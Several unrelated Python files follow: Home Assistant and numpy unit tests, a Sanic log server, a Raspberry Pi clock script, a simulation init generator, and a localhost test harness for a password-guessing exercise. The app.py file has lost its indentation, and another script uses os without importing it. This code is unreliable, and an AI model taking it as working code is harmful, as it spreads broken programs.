        # Wildcard listener: fires on every change of this entity.
        self.states.track_change(
            'light.Bowl', lambda a, b, c: wildcard_runs.append(1),
            ha.MATCH_ALL, ha.MATCH_ALL)

        # Set same state should not trigger a state change/listener
        self.states.set('light.Bowl', 'on')
        self.bus._pool.block_till_done()
        self.assertEqual(0, len(specific_runs))
        self.assertEqual(0, len(wildcard_runs))

        # State change off -> on
        self.states.set('light.Bowl', 'off')
        self.bus._pool.block_till_done()
        self.assertEqual(1, len(specific_runs))
        self.assertEqual(1, len(wildcard_runs))

        # State change off -> off
        # Same state with new attributes still counts as a change for the
        # wildcard listener, but not for the specific on->off listener.
        self.states.set('light.Bowl', 'off', {"some_attr": 1})
        self.bus._pool.block_till_done()
        self.assertEqual(1, len(specific_runs))
        self.assertEqual(2, len(wildcard_runs))

        # State change off -> on
        self.states.set('light.Bowl', 'on')
        self.bus._pool.block_till_done()
        self.assertEqual(1, len(specific_runs))
        self.assertEqual(3, len(wildcard_runs))

    def test_case_insensitivty(self):
        """ Entity ids are matched case-insensitively. """
        self.pool.add_worker()

        runs = []

        # NOTE(review): registers through the track_state_change helper with
        # a mock HA object instead of self.states.track_change -- presumably
        # to exercise the public helper API; confirm against the helper.
        track_state_change(
            ha._MockHA(self.bus), 'light.BoWl', lambda a, b, c: runs.append(1),
            ha.MATCH_ALL, ha.MATCH_ALL)

        self.states.set('light.BOWL', 'off')
        self.bus._pool.block_till_done()

        self.assertTrue(self.states.is_state('light.bowl', 'off'))
        self.assertEqual(1, len(runs))

    def test_last_changed_not_updated_on_same_state(self):
        """ Re-setting an identical state must keep last_changed. """
        state = self.states.get('light.Bowl')

        # Sleep so a real change would produce a visibly different timestamp.
        time.sleep(1)

        self.states.set("light.Bowl", "on")

        self.assertEqual(state.last_changed,
                         self.states.get('light.Bowl').last_changed)
class TestServiceCall(unittest.TestCase):
    """ Test ServiceCall class. """

    def test_repr(self):
        """ Test repr method. """
        no_data = ha.ServiceCall('homeassistant', 'start')
        self.assertEqual("<ServiceCall homeassistant.start>", str(no_data))

        with_data = ha.ServiceCall('homeassistant', 'start', {"fast": "yes"})
        self.assertEqual(
            "<ServiceCall homeassistant.start: fast=yes>", str(with_data))
class TestServiceRegistry(unittest.TestCase):
    """ Test ServiceRegistry methods. """

    def setUp(self):  # pylint: disable=invalid-name
        """ things to be run when tests are started. """
        # 0 workers: tests that need the handler to run add workers first.
        self.pool = ha.create_worker_pool(0)
        self.bus = ha.EventBus(self.pool)
        self.services = ha.ServiceRegistry(self.bus, self.pool)
        self.services.register("test_domain", "test_service", lambda x: None)

    def tearDown(self):  # pylint: disable=invalid-name
        """ Stop down stuff we started. """
        if self.pool.worker_count:
            self.pool.stop()

    def test_has_service(self):
        """ Test has_service method. """
        self.assertTrue(
            self.services.has_service("test_domain", "test_service"))
        self.assertFalse(
            self.services.has_service("test_domain", "non_existing"))
        self.assertFalse(
            self.services.has_service("non_existing", "test_service"))

    def test_services(self):
        """ The services property maps domain -> list of service names. """
        expected = {
            'test_domain': ['test_service']
        }
        self.assertEqual(expected, self.services.services)

    def test_call_with_blocking_done_in_time(self):
        """ A blocking call returns True once the handler has run. """
        self.pool.add_worker()
        self.pool.add_worker()
        calls = []
        self.services.register("test_domain", "register_calls",
                               lambda x: calls.append(1))

        self.assertTrue(
            self.services.call('test_domain', 'register_calls', blocking=True))
        self.assertEqual(1, len(calls))

    def test_call_with_blocking_not_done_in_time(self):
        """ A blocking call returns False when the timeout elapses. """
        calls = []
        self.services.register("test_domain", "register_calls",
                               lambda x: calls.append(1))

        orig_limit = ha.SERVICE_CALL_LIMIT
        ha.SERVICE_CALL_LIMIT = 0.01
        try:
            # No workers were added, so the handler cannot run in time.
            self.assertFalse(
                self.services.call('test_domain', 'register_calls',
                                   blocking=True))
            self.assertEqual(0, len(calls))
        finally:
            # FIX: restore the module-level limit even if an assertion fails,
            # so a failure here cannot leak a 0.01s timeout into later tests.
            ha.SERVICE_CALL_LIMIT = orig_limit

    def test_call_non_existing_with_blocking(self):
        """ A blocking call to an unknown service returns False. """
        self.pool.add_worker()
        self.pool.add_worker()
        orig_limit = ha.SERVICE_CALL_LIMIT
        ha.SERVICE_CALL_LIMIT = 0.01
        try:
            self.assertFalse(
                self.services.call('test_domain', 'i_do_not_exist',
                                   blocking=True))
        finally:
            # FIX: same restore-on-failure guarantee as above.
            ha.SERVICE_CALL_LIMIT = orig_limit
class TestConfig(unittest.TestCase):
    """ Test the ha.Config helper. """

    def setUp(self):  # pylint: disable=invalid-name
        """ things to be run when tests are started. """
        self.config = ha.Config()

    @staticmethod
    def _data_dir():
        """Platform-dependent base directory for configuration files."""
        return os.getenv('APPDATA') if os.name == "nt" \
            else os.path.expanduser('~')

    def test_config_dir_set_correct(self):
        """ Test config dir set correct. """
        self.assertEqual(os.path.join(self._data_dir(), ".homeassistant"),
                         self.config.config_dir)

    def test_path_with_file(self):
        """ Test get_config_path method. """
        self.assertEqual(
            os.path.join(self._data_dir(), ".homeassistant", "test.conf"),
            self.config.path("test.conf"))

    def test_path_with_dir_and_file(self):
        """ Test get_config_path method. """
        self.assertEqual(
            os.path.join(self._data_dir(), ".homeassistant", "dir",
                         "test.conf"),
            self.config.path("dir", "test.conf"))

    def test_temperature_not_convert_if_no_preference(self):
        """ No unit conversion to happen if no preference. """
        self.assertEqual(
            (25, TEMP_CELCIUS), self.config.temperature(25, TEMP_CELCIUS))
        self.assertEqual(
            (80, TEMP_FAHRENHEIT),
            self.config.temperature(80, TEMP_FAHRENHEIT))

    def test_temperature_not_convert_if_invalid_value(self):
        """ No unit conversion to happen if no preference. """
        self.config.temperature_unit = TEMP_FAHRENHEIT
        self.assertEqual(
            ('25a', TEMP_CELCIUS),
            self.config.temperature('25a', TEMP_CELCIUS))

    def test_temperature_not_convert_if_invalid_unit(self):
        """ No unit conversion to happen if no preference. """
        self.assertEqual(
            (25, 'Invalid unit'),
            self.config.temperature(25, 'Invalid unit'))

    def test_temperature_to_convert_to_celcius(self):
        """ Fahrenheit input is converted when preference is Celsius. """
        self.config.temperature_unit = TEMP_CELCIUS

        self.assertEqual(
            (25, TEMP_CELCIUS), self.config.temperature(25, TEMP_CELCIUS))
        self.assertEqual(
            (26.7, TEMP_CELCIUS),
            self.config.temperature(80, TEMP_FAHRENHEIT))

    def test_temperature_to_convert_to_fahrenheit(self):
        """ Celsius input is converted when preference is Fahrenheit. """
        self.config.temperature_unit = TEMP_FAHRENHEIT

        self.assertEqual(
            (77, TEMP_FAHRENHEIT), self.config.temperature(25, TEMP_CELCIUS))
        self.assertEqual(
            (80, TEMP_FAHRENHEIT),
            self.config.temperature(80, TEMP_FAHRENHEIT))

    def test_as_dict(self):
        """ A fresh Config serializes with all-default values. """
        expected = {
            'latitude': None,
            'longitude': None,
            'temperature_unit': None,
            'location_name': None,
            'time_zone': 'UTC',
            'components': [],
        }

        self.assertEqual(expected, self.config.as_dict())
class TestWorkerPool(unittest.TestCase):
    """Ensure the worker pool keeps processing after a job raises."""

    def test_exception_during_job(self):
        pool = ha.create_worker_pool(1)
        completed = []

        def failing_job(_):
            raise Exception("Test breaking worker pool")

        def recording_job(_):
            completed.append(1)

        pool.add_job(ha.JobPriority.EVENT_DEFAULT, (failing_job, None))
        pool.add_job(ha.JobPriority.EVENT_DEFAULT, (recording_job, None))
        pool.block_till_done()

        # The second job still ran despite the first one raising.
        self.assertEqual(1, len(completed))
|
app.py | # -- Imports --------------------------------------------------------------------------
from sanic import Sanic, Blueprint
from threading import Thread
from gspread import authorize
from oauth2client.service_account import ServiceAccountCredentials
from limits.strategies import FixedWindowElasticExpiryRateLimiter
from limits.storage import MemoryStorage, RedisStorage
from copy import copy
from .middlewares import middlewares
from .routes import blueprints
from .. import moca_modules as mzk
from .. import core
# -------------------------------------------------------------------------- Imports --
# -- App --------------------------------------------------------------------------
# Server header.
if 'server' not in map(lambda i: i.lower(), core.SERVER_CONFIG['headers'].keys()):
core.SERVER_CONFIG['headers']['Server'] = f'MocaFileLog({core.VERSION})'
# Access-Control-Allow-Credentials header.
if core.SERVER_CONFIG['access_control_allowed_credentials']:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Credentials'] = True
else:
pass
# Access-Control-Allow-Headers header.
if '*' in core.SERVER_CONFIG['access_control_allow_headers']:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Headers'] = '*'
else:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Headers'] = ', '.join(
core.SERVER_CONFIG['access_control_allow_headers']
)
# Access-Control-Allow-Methods header.
if '*' in core.SERVER_CONFIG['access_control_allowed_methods']:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Methods'] = '*'
else:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Methods'] = ', '.join(
core.SERVER_CONFIG['access_control_allowed_methods']
)
# Access-Control-Max-Age header.
# FIX: this previously assigned to 'Access-Control-Allow-Methods', which
# both clobbered the Allow-Methods value computed above and never set
# Max-Age at all.
core.SERVER_CONFIG['headers']['Access-Control-Max-Age'] = int(
    core.SERVER_CONFIG['access_control_max_age']
)
# Access-Control-Expose-Headers
if '*' in core.SERVER_CONFIG['access_control_expose_headers']:
core.SERVER_CONFIG['headers']['Access-Control-Expose-Headers'] = '*'
else:
core.SERVER_CONFIG['headers']['Access-Control-Expose-Headers'] = ', '.join(
core.SERVER_CONFIG['access_control_expose_headers']
)
# Sanic App
moca_sanic: mzk.MocaSanic = mzk.MocaSanic(
f'MocaFileLog({core.VERSION})',
app=None,
host=None,
port=None,
unix=None,
ssl=None,
certfile=core.SERVER_CONFIG['ssl']['cert'],
keyfile=core.SERVER_CONFIG['ssl']['key'],
log_dir=core.LOG_DIR,
internal_key=None,
access_log=core.SERVER_CONFIG['access_log'],
log_level=core.SERVER_CONFIG['log_level'],
use_ipv6=None,
workers=1,
headers=core.SERVER_CONFIG['headers'],
debug=core.SERVER_CONFIG['debug'],
auto_reload=core.SERVER_CONFIG['auto_reload'],
websocket=True,
backlog=core.SERVER_CONFIG['backlog'],
origins=core.SERVER_CONFIG['access_control_allowed_origins'],
)
moca_sanic.load_sanic_server_configs(core.SANIC_CONFIG)
app: Sanic = moca_sanic.app
def run_app(name: str, host: str, port: int, use_ipv6: bool, file: str, level: int) -> None:
    """Configure the module-level MocaSanic instance and start serving.

    Mounts all blueprints under ``/moca-file-log/<name>``, stores the runtime
    parameters both on the MocaSanic wrapper and on the Sanic app object
    (the lifecycle listeners below read them from the app), then blocks in
    ``moca_sanic.run()``.
    """
    moca_sanic.app.blueprint(Blueprint.group(*blueprints, url_prefix=f'/moca-file-log/{name}'))
    # NOTE(review): pokes private attributes of MocaSanic/Sanic directly;
    # presumably the wrapper exposes no public setters -- confirm against
    # mzk.MocaSanic before refactoring.
    moca_sanic._host = host
    moca_sanic._port = port
    moca_sanic._use_ipv6 = use_ipv6
    moca_sanic.app._log_name = name
    moca_sanic.app._host = host
    moca_sanic.app._port = port
    moca_sanic.app._use_ipv6 = use_ipv6
    moca_sanic.app._log_file_path = file
    moca_sanic.app._log_level = level
    moca_sanic.run()
# set event listener
async def before_server_start(app_: Sanic, loop):
    """Initialize per-process resources before requests are accepted.

    Sets the process title, loads the system config / IP blacklist /
    API-key files, opens the client and secure log files, creates the
    rate limiter, optionally connects to Google Spreadsheets, and starts
    a daemon thread that reloads the watched files once per second.
    """
    mzk.set_process_name(f'MocaFileLog({core.VERSION}) --- {app_._log_name}')
    mzk.print_info(f'Starting Sanic server. -- {mzk.get_my_pid()}')
    app_.system_config: mzk.MocaConfig = mzk.MocaConfig(
        core.SYSTEM_CONFIG, manual_reload=True
    )
    app_.ip_blacklist: mzk.MocaSynchronizedJSONListFile = mzk.MocaSynchronizedJSONListFile(
        core.IP_BLACKLIST_FILE, manual_reload=True, remove_duplicates=True,
    )
    app_.api_key_config: mzk.MocaSynchronizedJSONListFile = mzk.MocaSynchronizedJSONListFile(
        core.API_KEY_FILE, manual_reload=True
    )
    # Shared in-memory cache (e.g. the 'dos-detect' request counters).
    app_.dict_cache = {}
    # Absolute log paths are used as-is; relative paths resolve under
    # CLIENT_LOG_DIR.
    if app_._log_file_path.startswith('/'):
        file = app_._log_file_path
    else:
        file = core.CLIENT_LOG_DIR.joinpath(app_._log_file_path)
    app_.moca_log = mzk.MocaFileLog(file, app_._log_level)
    app_.secure_log = mzk.MocaFileLog(core.LOG_DIR.joinpath('secure.log'))
    app_.scheduler = mzk.MocaScheduler()
    # Rows buffered for the spreadsheet sync job (see after_server_start).
    app_.log_list = []
    # Rate-limiter storage: in-process memory unless a Redis URL is given.
    if core.SERVER_CONFIG['rate_limiter_redis_storage'] is None:
        app_._storage_for_rate_limiter = MemoryStorage()
    else:
        app_._storage_for_rate_limiter = RedisStorage(core.SERVER_CONFIG['rate_limiter_redis_storage'])
    app_.rate_limiter = FixedWindowElasticExpiryRateLimiter(app_._storage_for_rate_limiter)
    # Google Spreadsheets sync is enabled only when auth is configured
    # for this log name.
    if core.LOG_CONFIG[app_._log_name].get('google_spread_sheets_auth', None) is not None:
        scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
        app_._credentials = ServiceAccountCredentials.from_json_keyfile_name(
            str(core.CONFIG_DIR.joinpath(core.LOG_CONFIG[app_._log_name].get('google_spread_sheets_auth'))),
            scope,
        )
        app_._gc = authorize(app_._credentials)
        app_.workbook = app_._gc.open_by_key(core.LOG_CONFIG[app_._log_name].get('spread_sheets_key'))
    else:
        app_.workbook = None  # spreadsheet sync disabled

    def __reload_timer(application: Sanic) -> None:
        # Reload the watched files once per second (runs as daemon thread).
        while True:
            mzk.sleep(1)
            application.system_config.reload_file()
            application.ip_blacklist.reload_file()
            application.api_key_config.reload_file()
    app_._timer_thread = Thread(target=__reload_timer, args=(app_,), daemon=True)
    app_._timer_thread.start()
async def after_server_start(app_: Sanic, loop):
    """Register the periodic background jobs once the server is up."""
    mzk.print_info(f'Started Sanic server. -- {mzk.get_my_pid()}')

    # run scheduled tasks.
    def dos_detect():
        # Swap out the per-window request counters, then blacklist any IP
        # whose count exceeds the configured threshold (default 5000).
        info = copy(app_.dict_cache.get('dos-detect'))
        app_.dict_cache['dos-detect'] = {}
        if info is None:
            return None
        for ip, count in info.items():
            # NOTE(review): reads core.system_config (lowercase) while
            # before_server_start stores the loaded config on
            # app_.system_config -- confirm `core` really exposes this
            # attribute, otherwise this raises AttributeError at runtime.
            if count > core.system_config.get_config('dos_detect', int, 5000):
                app_.ip_blacklist.append(ip)
                app_.secure_log.write_log(
                    f"Add {ip} to the blacklist. <dos_detection>",
                    mzk.LogLevel.WARNING
                )

    def sync_with_spread_sheets():
        # Flush buffered log rows (app_.log_list) into the Google workbook.
        # Worksheets are titled "<first>-<last>" by global row range and hold
        # 5001 sheet rows (1 header + 5000 data rows); a new sheet is added
        # when the latest one is full.
        if len(app_.log_list) == 0:
            return None
        if app_.workbook is not None:
            workbook = app_.workbook
            if len(workbook.worksheets()) == 1 and not workbook.worksheets()[0].title.startswith('1-'):
                # Fresh workbook: replace the default sheet with "1-0" and
                # write the header row.
                workbook.add_worksheet(title='1-0', rows=5001, cols=3)
                workbook.del_worksheet(workbook.worksheets()[0])
                a1, b1, c1 = workbook.worksheets()[0].range('A1:C1')
                a1.value, b1.value, c1.value = 'Level', 'Timestamp', 'Message'
                workbook.worksheets()[0].update_cells([a1, b1, c1])
            else:
                latest = workbook.worksheets()[-1]
                start, end = int(latest.title.split('-')[0]), int(latest.title.split('-')[1])
                # Next free sheet row (rows 1 is the header, data starts at 2).
                index = end - start + 3
                if index == 5002:
                    # Current sheet is full -- open a new one with a header.
                    workbook.add_worksheet(title=f'{end+1}-{end}', rows=5001, cols=3)
                    a1, b1, c1 = workbook.worksheets()[-1].range('A1:C1')
                    a1.value, b1.value, c1.value = 'Level', 'Timestamp', 'Message'
                    workbook.worksheets()[-1].update_cells([a1, b1, c1])
                    latest = workbook.worksheets()[-1]
                    start, end = int(latest.title.split('-')[0]), int(latest.title.split('-')[1])
                    index = end - start + 3
                if (index + len(app_.log_list)) <= 5002:
                    # Everything fits on the current sheet.
                    log_list = app_.log_list
                    app_.log_list = []
                else:
                    # Only take as many rows as fit; keep the rest buffered
                    # for the next run.
                    log_list = app_.log_list[:5002-index]
                    app_.log_list[:5002 - index] = []
                cell_list = latest.range(f'A{index}:C{index + len(log_list)-1}')
                i = 0
                for level, timestamp, message in log_list:
                    cell_list[i].value, cell_list[i+1].value, cell_list[i+2].value = level, timestamp, message
                    i += 3
                latest.update_cells(cell_list)
                index += len(log_list)
                # Rename the sheet so its title reflects the new row range.
                latest.update_title(f'{start}-{index + start - 3}')
    app_.scheduler.add_event_per_second('Dos-detect', dos_detect, 5)
    app_.scheduler.add_event_per_second('Sync-With-Spread-Sheets', sync_with_spread_sheets, 5)
async def before_server_stop(app_: Sanic, loop):
    """Log that the Sanic server is about to shut down."""
    mzk.print_info(f'Stopping Sanic server. -- {mzk.get_my_pid()}')


async def after_server_stop(app_: Sanic, loop):
    """Log that the Sanic server has stopped."""
    mzk.print_info(f'Stopped Sanic server. -- {mzk.get_my_pid()}')

# Wire the lifecycle listeners into the MocaSanic wrapper.
moca_sanic.before_server_start = before_server_start
moca_sanic.after_server_start = after_server_start
moca_sanic.before_server_stop = before_server_stop
moca_sanic.after_server_stop = after_server_stop

# Middleware
# Each entry maps to (attach_point, handler); register them all.
for item in middlewares.values():
    moca_sanic.add_middleware(item[1], item[0])
# -------------------------------------------------------------------------- App --
|
tests.py | from hstest.stage_test import StageTest
from hstest.test_case import TestCase
from hstest.check_result import CheckResult
from hstest.exceptions import WrongAnswerException
from threading import Thread
from time import sleep
import socket
import random
CheckResult.correct = lambda: CheckResult(True, '')
CheckResult.wrong = lambda feedback: CheckResult(False, feedback)
# Alphabet used for generated passwords: lowercase letters and digits.
abc = 'abcdefghijklmnopqrstuvwxyz1234567890'


def random_password():
    """Generate a random password of length 2 or 3 drawn from `abc`."""
    length = random.randint(2, 3)
    return ''.join(random.choice(abc) for _ in range(length))
class Hacking(StageTest):
    """Stage test that runs a local TCP server for the student's program
    to attack, then checks what the program sent and printed."""

    def __init__(self, module):
        super().__init__(module)
        self.ready = False      # server socket is bound and listening
        self.sock = None        # listening socket
        self.serv = None        # server thread
        self.connected = False  # a client connected at least once
        self.message = []       # decoded messages received from the client

    def start_server(self):
        """Start the server thread and block until the socket is bound."""
        self.serv = Thread(target=lambda: self.server())
        self.serv.start()
        self.ready = False
        while not self.ready:
            try:
                sleep(0.1)  # socket needs to be set up before test
            except KeyboardInterrupt:
                pass

    def stop_server(self):
        """Close the listening socket and join the server thread.

        Safe to call more than once: closing a closed socket is a no-op
        and join() returns immediately for a finished thread.
        """
        self.sock.close()
        self.serv.join()

    def server(self):
        ''' creating a server and answering clients '''
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(('localhost', 9090))
        self.ready = True
        try:
            self.sock.listen(1)
            conn, addr = self.sock.accept()
            self.connected = True
            conn.settimeout(15)
            while True:
                data = conn.recv(1024)
                if not data:
                    break
                self.message.append(data.decode('utf8'))
                # Every attempt is rejected so the client keeps guessing.
                conn.send('Wrong password!'.encode('utf8'))
            conn.close()
        except OSError:
            # FIX: narrowed from a bare `except:`. Socket errors and
            # timeouts (socket.timeout is an OSError subclass) end the
            # server loop as before, but programming errors are no longer
            # silently swallowed.
            pass

    def generate(self):
        """Start the server and produce one test case with a random word."""
        self.start_server()
        test_word = random_password()
        return [
            TestCase(
                args=['localhost', '9090', test_word], attach=[test_word])
        ]

    def check(self, reply, attach):
        """Validate connection, sent data and the program's printed output."""
        self.stop_server()
        if not self.connected:
            return CheckResult.wrong("You didn't connect to the server")
        if len(self.message) == 0:
            return CheckResult.wrong('You sent nothing to the server')
        if len(reply) == 0:
            return CheckResult.wrong(
                'You did not print anything')
        if reply.split('\n')[0] != 'Wrong password!':
            return CheckResult.wrong(
                'The line you printed is not the one sent by server')
        if self.message != attach:
            return CheckResult.wrong(
                'You sent the wrong information to the server')
        return CheckResult.correct()
if __name__ == '__main__':
    # Run the stage test directly against the student's hacking.hack module.
    test = Hacking('hacking.hack')
    test.run_tests()
    # NOTE(review): check() already calls stop_server(); presumably this is
    # a safety net for runs that never reach check() -- stop_server must
    # tolerate a second call (close() on a closed socket is a no-op).
    test.stop_server()
|
stuff.py | #!/usr/bin/env python
import time
from datetime import datetime
from datetime import timedelta
from datetime import date
import sys
import threading
import RPi.GPIO as GPIO
import Adafruit_DHT
from Adafruit_LED_Backpack import SevenSegment
import holidays
us_holidays = holidays.US()
holiday_list = [
'New Year\'s Day',
'New Year\'s Day (Observed)',
'Memorial Day',
'Independence Day',
'Independence Day (Observed)',
'Labor Day',
'Thanksgiving',
'Christmas Day',
'Christmas Day (Observed)'
]
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
BLUE_LED = 18
GREEN_LED = 23
GPIO.setup(BLUE_LED, GPIO.OUT)
GPIO.setup(GREEN_LED, GPIO.OUT)
left_display = SevenSegment.SevenSegment(address=0x71)
right_display = SevenSegment.SevenSegment(address=0x72)
left_display.begin()
right_display.begin()
sensor = Adafruit_DHT.DHT22
pin = 4
ctr = 0
start_date = datetime(2017, 6, 22, 0, 1, 1)
def update_temp():
    """Read the DHT22 sensor and show the temperature on the right display."""
    _humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)
    if temperature is None:
        return  # failed read: leave the previous value on the display
    right_display.clear()
    right_display.set_colon(False)
    right_display.print_float(temperature)
    right_display.write_display()
def leds_on(now):
    """Light the blue LED; light the green LED too on alternating weeks.

    Week parity is derived from the Monday-aligned difference between the
    fixed start_date (2017-06-22) and `now`.
    """
    GPIO.output(BLUE_LED, True)
    first = (start_date - timedelta(days=start_date.weekday()))
    second = (now - timedelta(days=now.weekday()))
    # NOTE(review): both datetimes keep their time-of-day, so `.days` is not
    # guaranteed to be a multiple of 7, and true division yields a float, so
    # `weeks % 2 == 1` can be False even in an "odd" week.  Integer math on
    # date-only values, e.g. (second.date() - first.date()).days // 7, looks
    # intended -- confirm the desired on-weeks before changing.
    weeks = (first - second).days / 7
    if weeks % 2 == 1:
        GPIO.output(GREEN_LED, True)
def leds_off():
    """Turn both indicator LEDs off."""
    for led in (BLUE_LED, GREEN_LED):
        GPIO.output(led, False)
def update_time(now):
    """Render HH:MM on the left display, blinking the colon each second."""
    hour_tens, hour_ones = divmod(now.hour, 10)
    minute_tens, minute_ones = divmod(now.minute, 10)
    left_display.clear()
    left_display.set_digit(0, hour_tens)
    left_display.set_digit(1, hour_ones)
    left_display.set_digit(2, minute_tens)
    left_display.set_digit(3, minute_ones)
    left_display.set_colon(now.second % 2)
    left_display.write_display()
def holiday_week(day):
    """Return True if `day` or any of the three preceding days is a holiday."""
    return any(holiday(day - timedelta(days=offset)) for offset in range(4))
def holiday(day):
    """Return True if `day` falls on one of the holidays in holiday_list.

    `us_holidays.get(day)` yields the holiday name (or a list of names when
    several coincide); membership is checked against holiday_list.
    """
    hol_test = us_holidays.get(day)
    if hol_test in holiday_list:
        return True
    if isinstance(hol_test, list):
        # FIX: reuse the value already looked up instead of calling
        # us_holidays.get(day) a second time.
        return bool(set(holiday_list) & set(hol_test))
    return False
print('Press Ctrl-C to quit.')
try:
    while(True):
        now = datetime.now()
        # once every 30 seconds
        # (the loop sleeps 0.25s, so 120 iterations ~= 30 seconds)
        if ctr == 120:
            # Sensor reads are slow (read_retry); run in a thread so the
            # clock display keeps updating.
            t = threading.Thread(target=update_temp)
            t.start()
            ctr = 0
        leds_off()
        weekday = now.weekday()
        if weekday == 3:
            # thursday
            if not holiday_week(now):
                leds_on(now)
        elif weekday == 4:
            # friday
            # Friday acts as the make-up day when Thursday fell in a
            # holiday week.
            previous_day = now + timedelta(days=-1)
            if holiday_week(previous_day):
                leds_on(now)
        update_time(now)
        time.sleep(0.25)
        ctr += 1
finally:
    # Always release the GPIO pins, including on Ctrl-C.
    GPIO.cleanup()
|
docker_xml_to_init.py | import xml.etree.ElementTree as ET
import sys
import uuid
from interscity_client import platform
from multiprocessing import Process
def register_car(generated_uuid):
    """Register one car resource on the platform (run in a child process).

    NOTE(review): relies on the module-level `car_builder` created in the
    __main__ block below; only call after that builder exists.
    """
    car_builder.register(generated_uuid, "Car "+generated_uuid, ["city_traffic"])
if __name__ == '__main__':
    # Pick the trips XML according to the runtime environment.
    RUNNING_ENV = os.getenv("RUNNING_ENV")  # FIX: os.get_env does not exist
    if RUNNING_ENV is None:
        # FIX: `raise("...")."` was a syntax error (trailing dot) and tried
        # to raise a plain string, which is illegal in Python 3.
        raise RuntimeError(
            "Please, define the env variable `RUNNING_ENV` with either "
            "`docker_test` or `production`")
    if RUNNING_ENV == "docker_test":
        xml_path = "./validation/trips.xml"
    elif RUNNING_ENV == "production":  # FIX: `else if` is not Python syntax
        xml_path = "./production/trips.xml"
    else:
        raise RuntimeError(
            "`RUNNING_ENV` must be either `docker_test` or `production`, "
            "got: " + RUNNING_ENV)

    f = open("docker_validation.init", "a+")
    nodes = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm']
    computing_nodes = 13
    conn = platform.connection()
    if not conn.capability_available("city_traffic"):
        conn.create_capability("city_traffic", "City Traffic", "sensor")
    car_builder = platform.resource_builder(connection=conn, capability="city_traffic", uniq_key="uuid")
    gen_id = 1
    # FIX: parse the environment-selected file; the old hard-coded XML_PATH
    # silently ignored the RUNNING_ENV logic above.
    tree = ET.parse(xml_path).getroot()
    workers = []
    for child in tree:
        attrs = child.attrib
        # Only 1/8 of the declared cars are instantiated.
        count_to_use = int(int(attrs["count"]) / 8)
        for v in range(0, count_to_use):
            generated_uuid = str(uuid.uuid4())
            # FIX: args must be a tuple -- (generated_uuid) was a bare str,
            # which Process would reject / unpack character by character.
            p = Process(target=register_car, args=(generated_uuid,))
            p.start()
            workers.append(p)
            payload = """
{{ class_Car, [#{{id => "{}", origin => "{}", destination => "{}", start_time => {}, start_link => "{}", uuid => "{}" }}], {} }}.
""".format(gen_id, attrs["origin"], attrs["destination"], attrs["start"], attrs["link_origin"], generated_uuid, nodes[(v % computing_nodes)])
            f.write(payload)
            gen_id += 1
            sys.stdout.write('.')
    # FIX: reap the registration processes instead of leaving zombies.
    for p in workers:
        p.join()
    f.close()
|
test_generator_mt19937.py | import sys
import hashlib
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
# Shared generator for tests that do not need a reproducible seed.
random = Generator(MT19937())

# Reference data for MT19937.jumped(): for each seed and step count, the
# md5 of the state key vector and the position, both before ("initial")
# and after ("jumped") the jump.
JUMP_TEST_DATA = [
    {
        "seed": 0,
        "steps": 10,
        "initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
        "jumped": {"key_md5": "8cb7b061136efceef5217a9ce2cc9a5a", "pos": 598},
    },
    {
        "seed": 384908324,
        "steps": 312,
        "initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
        "jumped": {"key_md5": "2ecdbfc47a895b253e6e19ccb2e74b90", "pos": 276},
    },
    {
        "seed": [839438204, 980239840, 859048019, 821],
        "steps": 511,
        "initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
        "jumped": {"key_md5": "433b85229f2ed853cde06cd872818305", "pos": 475},
    },
]
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
    """Module-scoped fixture: run integer-range tests with endpoint=True
    (closed interval) and endpoint=False (half-open interval)."""
    return request.param
class TestSeed:
    """Seeding behaviour of Generator(MT19937(...))."""

    def test_scalar(self):
        # Known first draws for the extreme 32-bit scalar seeds.
        for seed, expected in ((0, 479), (4294967295, 324)):
            gen = Generator(MT19937(seed))
            assert_equal(gen.integers(1000), expected)

    def test_array(self):
        # Sequence seeds: range/ndarray pairs and single-element lists.
        for seed, expected in ((range(10), 465), (np.arange(10), 465),
                               ([0], 479), ([4294967295], 324)):
            gen = Generator(MT19937(seed))
            assert_equal(gen.integers(1000), expected)

    def test_seedsequence(self):
        bitgen = MT19937(SeedSequence(0))
        assert_equal(bitgen.random_raw(1), 2058676884)

    def test_invalid_scalar(self):
        # seed must be an unsigned 32 bit integer
        assert_raises(TypeError, MT19937, -0.5)
        assert_raises(ValueError, MT19937, -1)

    def test_invalid_array(self):
        # seed must be an unsigned integer
        assert_raises(TypeError, MT19937, [-0.5])
        assert_raises(ValueError, MT19937, [-1])
        assert_raises(ValueError, MT19937, [1, -2, 4294967296])

    def test_noninstantized_bitgen(self):
        # Passing the class itself (not an instance) must be rejected.
        assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
    """Binomial distribution edge cases."""

    def test_n_zero(self):
        # Tests the corner case of n == 0 for the binomial distribution.
        # binomial(0, p) should be zero for any p in [0, 1].
        # This test addresses issue #3480.
        zeros = np.zeros(2, dtype='int')
        for prob in (0, .5, 1):
            assert_(random.binomial(0, prob) == 0)
            assert_array_equal(random.binomial(zeros, prob), zeros)

    def test_p_is_nan(self):
        # Issue #4571.
        assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
    """Multinomial sampling: basic calls, output shapes, validation."""

    def test_basic(self):
        random.multinomial(100, [0.2, 0.8])

    def test_zero_probability(self):
        random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])

    def test_int_negative_interval(self):
        assert_(-5 <= random.integers(-5, -1) < -1)
        draws = random.integers(-5, -1, 5)
